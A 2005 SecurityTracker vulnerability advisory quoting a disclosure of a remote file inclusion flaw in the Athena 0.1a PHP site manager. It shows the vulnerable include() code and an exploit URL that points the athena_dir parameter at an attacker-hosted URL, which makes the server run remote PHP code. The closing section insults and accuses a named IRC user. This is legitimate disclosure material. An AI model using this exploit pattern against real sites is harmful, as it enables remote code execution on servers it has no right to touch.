Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Athena Include File Bug Lets Remote Users Execute Arbitrary Code
|
|
SecurityTracker Alert ID: 1015278
|
|
SecurityTracker URL: http://securitytracker.com/id?1015278
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Nov 28 2005
|
Impact: Execution of arbitrary code via network, User access via network
|
Exploit Included: Yes
|
Version(s): 0.1a
|
Description: beford and ][GB][ reported a vulnerability in Athena. A remote user can execute arbitrary code on the target system.
The 'athena.php' does not properly validate user-supplied input in several parameters. A remote user can supply a specially crafted
URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating
system commands, will run with the privileges of the target web service.
A demonstration exploit URL is provided:
http://[target]/path_to_athena/athena.php?athena_d
ir=http://[attacker_url]
|
Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: sourceforge.net/projects/athena (Links to External Site)
|
Cause: Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: gb.network@gmail.com
|
Message History:
None.
|
Source Message Contents
|
Date: 26 Nov 2005 22:23:18 -0000
From: gb.network@gmail.com
Subject: Remote file include in Athena
|
Language: PHP
Script: Athena
Version: 0.1a
Official website: http://sourceforge.net/projects/athena
Problem: Remote file inclusion
Discovered by: beford & ][GB][
Description:
===========
A simple website management system written in oo php that uses a mysql database
to store user and group rights and the site content.
Problem:
========
A remote user can include and execute arbitrary PHP code from the remote location.
The problem is in the file "athena.php" for line 1 to 10:
include("$athena_dir/headers.php");
include("$athena_dir/classes/debug.php");
include("$athena_dir/classes/mysql.php");
include("$athena_dir/classes/config.php");
include("$athena_dir/classes/page.php");
include("$athena_dir/classes/session.php");
include("$athena_dir/classes/user.php");
include("$athena_dir/classes/error.php");
include("$athena_dir/classes/modules.php");
include("$athena_dir/classes/admin.php");
Explotation example:
===================
http://[target]/path_to_athena/athena.php?athena_dir=http://[attacker_url]
Solution:
========
Not solution at this time.
Greetz:
=======
uyx, beford, Zetha, lithyum,_|MALANDDO|_ ,desKrriado, |LINUX|, Amon-Ra, Extremo, SecretDreams, caffa
&& irc.gigachat.net #uruguay, #h4ck3rsbr, #IYS, #D.O.M, #MSR ,,, irc.fullnetwork.org #full, #
f4kelive
irc.org.ve #uruguay, #venezuela
Fuckz:
=====
Morgan lamer and his irc.irc-argentina.org, his small ddos-botnet, its hidden in that server, the bot
s are
supposed to be argentinian users but noooo, he is using that ripped worm code i mentioned before!!!
he is such a leet h4x0r from santiago del estero (.ar)! hahahhaa
|
|
Go to the Top of This SecurityTracker Archive Page
|
